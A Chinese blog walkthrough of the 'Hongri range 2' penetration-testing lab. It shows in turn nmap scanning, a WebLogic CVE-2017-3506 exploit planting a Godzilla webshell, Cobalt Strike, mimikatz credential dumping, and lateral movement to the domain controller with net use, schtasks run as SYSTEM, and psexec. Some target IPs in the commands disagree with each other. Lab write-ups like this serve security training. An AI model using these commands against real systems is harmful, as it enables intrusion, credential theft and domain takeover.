首页 > 其他分享 >红日靶场2

红日靶场2

时间:2024-06-03 22:55:50浏览次数:14  
标签:红日 shell 网段 52.10 192.168 exe 11.80 靶场

环境搭建

配置ip,web机有两张网卡,我对nat设置为192.168.11.0网段,仅主机为192.168.52.0网段,这三台机子都要改一下ip,官方给出要恢复快照3,恢复的时候有问题,不用恢复没有影响
web机的网络情况如下就可以了
image

在这个目录下启动weblogic服务,以管理员身份运行startWebLogic
C:\Oracle\Middleware\user_projects\domains\base_domain
image

web渗透

ip扫描
nmap -sP 192.168.11.0/24

image
发现80,201两台机器(146为kali)
分别扫描端口服务
192.168.11.80
nmap -sT -Pn 192.168.11.80
image

192.168.11.201

image

发现192.168.11.80下有7001端口很明显的weblogic
浏览器访问

image

工具探测是否有cve漏洞

python WeblogicScan.py -u 192.168.11.80 -p 7001

image

发现有cve-2017-3506
利用exp传马
但是这个马不能用webshell管理工具连接,配代理抓包改成哥斯拉的jsp马(冰蝎,蚁剑都可)

proxychains java -jar WebLogic-XMLDecoder.jar -s http://192.168.174.144:7001 /wls-wsat/CoordinatorPortType11 shell6.jsp

image
修改马

image

image

上传成功

哥斯拉连接成功

image

域渗透

cs上线,将生成的exe后门传到被控机执行
上线成功

image

查看ip网段情况
shell ipconfig /all
image

发现192.168.52.0网段

传fscan扫描
shell fscan.exe -h 192.168.52.0/24
探测发现dc

image

扫描dc发现端口445等
shell fscan.exe -h 192.168.52.10
image

run mimikatz抓到administrator明文密码
image

ipc+计划任务横向
建立连接

shell net use \\192.168.52.10\ipc$ "123.com" /user:administrator

image

复制后门到dc
将被控机设置为中转监听器,用该监听器生成后门

image

image

shell copy 2.exe \\192.168.52.10\C$

image

创建计划任务
shell schtasks /create /s 192.168.52.10 /tn "text" /sc onstart /tr c:\2.exe /ru system /f

image

执行计划任务

shell schtasks /run /s 192.168.52.138 /i /tn "text"

image

上线成功拿下域控

image

同样psexec横向,要用smb监听

image

image
拿下域控

image

还有很多方法不一一赘述

标签:红日,shell,网段,52.10,192.168,exe,11.80,靶场
From: https://www.cnblogs.com/v3n0m-cccccc/p/18229860

相关文章

  • DVWA靶场---csrf遇到的问题解决方法
    1.解决low等级不携带cookie访问诈骗网站:设置---隐私与安全---浏览器隐私---增强型跟踪保护---自定义---cookie---跨站跟踪型cookie。2.解决medium等级referer显示不完整解决方法:在服务器的html上加一段:<metaname="referrer"content="no-referrer-when-downgrade">当从......
  • 红日靶场1
    环境搭建对web机添加两张网卡一张nat(web机默认为内网网段),另一张桥接为出网网卡也可nat+仅主机但是网络环境问题多这样环境就搭好了重启修改密码,启动phpstudyweb渗透扫描ipnmap-sP192.168.1.0/24得到192.168.1.9等,7为kali机ip,12为虚拟机ip访问http://192.168.1.9......
  • DC-5靶场渗透实战过程(个人学习)
    环境安装DC-5下载地址:https://www.vulnhub.com/entry/dc-4,313/下载完成安装后,将kali和DC-5的靶场网络环境设置一致kali的IP:192.168.37.129一、信息收集寻找靶机的IP方法一:利用nmap命令查找靶机IP方法二:利用arp-scan-l查看局域网内其他IP方式查找靶机IP发现靶机的IP为......
  • vulnhub--JIS靶场
    环境搭建kali(攻击机,NAT):192.168.96.4靶机(linux,NAT):ip未知信息收集主机探测netdiscover-i监听网卡发现96网段存活主机,猜测是96.5为靶机地址端口扫描nmap-sS-v192.168.96.5(高校快速的扫描,TCP半链接扫描) nmap-A192.168.96.5(全面扫描,更全面)fscan既可以扫端口又......
  • Less靶场SQL注入通关宝典
    这篇文章是一个sqil-labs靶场的保姆级教学,从安装、配置、场景通关都有详细的介绍,其中场景通关是我们这篇文章的重点。首先我们要了解sqli-labs靶场是什么?sqli-labs靶场是刚刚接触SQL注入的新手,了解SQL注入、练习SQL注入的一个很方便,很实用的一个靶场,配置简单,操作简单......
  • hongri靶场1
    靶机分享http://vulnstack.qiyuanxuetang.net/vuln/detail/2/环境搭建可以参照博客https://blog.csdn.net/weixin_44288604/article/details/108172737环境配置后各主机信息(仅个人)信息收集扫描端口namp扫描nmap-A-p-192.168.20.11(web服务器的对外ip)主机开放了两......
  • UploadLabs靶场
    目录Pass-01Pass-02Pass-03Pass-04Pass-05Pass-06Pass-07Pass-08Pass-09Pass-10Pass-11Pass-12Pass-13Pass-14Pass-15Pass-16Pass-17Pass-18Pass-19Pass-20都是鄙人做题思路记下来的一些心得笔记罢了。Pass-01先传一个图片过去,成功上传。尝试传muma过去,提示失败,但是这个提......
  • 靶场合集
    1.vulnhub很多安全竞赛都有在这里面出题,系列非常之多,不仅仅有web方面的,也有系统方面的渗透。网上也有很多writeup,环境直接下载虚拟机压缩包,解压即可使用。新手朋友建议下载先自行测试,然后再看writeup解题https://vulhub.org/(在线版)https://github.com/vulhub/vulhub(离线版)2.......
  • CSRF(Pikachu靶场练习)
    CSRF(get)自己随便输点东西,回显登录失败,查看源码没发现什么点开提示,登录进去看看看到可以修改个人信息,我们把居住改成China,修改成功,没发现urlhttp://127.0.0.1/pikachu/vul/csrf/csrfget/csrf_get_edit.php有变化这次我们在submit时抓包看看/pikachu/vul/csrf/csrfget/cs......
  • DC2靶场
    DC2下载地址:https://download.vulnhub.com/dc/DC-2.zip题目要求:MuchlikeDC-1,DC-2isanotherpurposelybuiltvulnerablelabforthepurposeofgainingexperienceintheworldofpenetrationtesting.AswiththeoriginalDC-1,it'sdesignedwithbeginners......